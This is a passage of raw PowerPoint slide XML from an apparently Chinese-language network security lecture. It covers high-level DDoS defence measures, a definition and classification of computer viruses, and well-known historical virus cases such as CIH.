              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0"/>
              <a:t>防火墙本身能抵御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>DdoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0"/>
              <a:t>攻击和其他一些攻击。在发现受到攻击的时候，可以将攻击导向一些牺牲主机，这样可以保护真正的主机不被攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>．用足够的机器承受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>黑客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0"/>
              <a:t>这是一种较为理想的应对策略。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>．充分利用网络设备保护网络资源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2200" dirty="0"/>
              <a:t>所谓网络设备是指路由器、防火墙等负载均衡设备，它们可将网络有效地保护起来。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="900" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="900"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04971CCF-1C94-4A8A-B5E3-A3AA78E3F5C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>预防为主的DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S应付方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195587" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DE5064-914D-4F5D-A49C-DC8D84FD009D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038225" y="1597025"/>
            <a:ext cx="8099425" cy="5472113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>5．过滤不必要的服务和端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>过滤不必要的服务和端口，即在路由器上过滤假IP，只开放服务端口成为目前很多服务器的流行做法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>．限制SYN/ICMP流量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>用户应在路由器上配置SYN/ICMP的最大流量来限制SYN/ICMP封包所能占有的最高频宽，这样，当出现大量的超过所限定的SYN/ICMP流量时，说明不是正常的网络访问，而是有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>黑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
              <a:t>．检查访问者的来源</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>使用单播反向路径转发(Unicast Reverse Path Forwarding)等通过反向路由器查询的方法检查访问者的IP地址是否是真，如果是假的，它将予以屏蔽。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="8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60449D61-C8AF-4866-934F-43725DEAE4AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S攻击例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204803" name="Picture 5" descr="Five Most Famous DDoS Attacks and Then Some | A10 Networks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2228DB9-B4EE-4E37-A50F-E787F4CD2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844675"/>
            <a:ext cx="9099550"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393EC136-B5F4-46B7-B73A-EC59D843B5B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S防御例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205827" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{513BB55A-9F73-4905-A092-576877BC4D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844675"/>
            <a:ext cx="764857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28" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E5DEBE-B4B5-4525-B08E-DF29383FD0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68425" y="3025775"/>
            <a:ext cx="7651750"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5F177536-5C22-4332-8A43-031EE8339EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S防御例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="207875" name="Picture 5" descr="https://masterxsec.github.io/2017/08/12/%E9%98%BF%E9%87%8C%E4%BA%91%E7%9B%B8%E5%85%B3%E5%AE%89%E5%85%A8%E4%BA%A7%E5%93%81%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86/%E9%AB%98%E9%98%B2IP%E6%8E%A5%E5%85%A5%E6%B5%81%E7%A8%8B.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D4A6A1-1401-4C73-8DE4-138E47169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525" y="1647825"/>
            <a:ext cx="8899525"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D6C04F59-F117-473C-91AB-D6A43FFD9792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S防御例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="209923" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FC5445-1F47-4994-879F-1F6FD9581C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444625"/>
            <a:ext cx="8916988" cy="541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ADA874AF-D486-4497-A8BC-96D929DB4AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S防御例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210947" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB47089C-537B-47FC-9C3A-D6ECA9A984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4475" y="2124075"/>
            <a:ext cx="7443788" cy="317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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CFA492E-7101-48FF-8FEC-E8A54635DCF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748211FC-4CF2-49E2-98F1-689DE05FDF91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>狭义上的计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是指能够进行自我传播、需要用户干预来触发执行的破坏性程序或代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自我传播是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传统计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的第二主要特征，且其传播过程是需要用户来介入的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>譬如用户通过双击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盘盘符的方式触发病毒，或者用户通过下载并打开电子邮件附件而触发病毒的传播。</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lide(fromBottom)">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slide(fromBottom)">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAFF8BF0-6EDB-46B2-8765-C3800BB7D712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88173A55-5C00-4DC1-B659-186613EF0DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>分类：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>引导扇区感染病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>文件感染病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>宏病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>混合体病毒</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66CA4225-14C5-4787-B550-B4257E53AB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>典型病毒案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E38198-8FC7-4B74-9C07-5694738DB489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>美丽莎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>爱虫病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>熊猫烧香</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机器狗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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0DDB36DC-04FE-44B3-854C-D25397F5F231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068652B8-D370-4CA6-B925-0C0C1C495776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5253038" y="1981200"/>
            <a:ext cx="3738562" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>陈盈豪：当时台湾的一个大学生</a:t>
            </a:r>
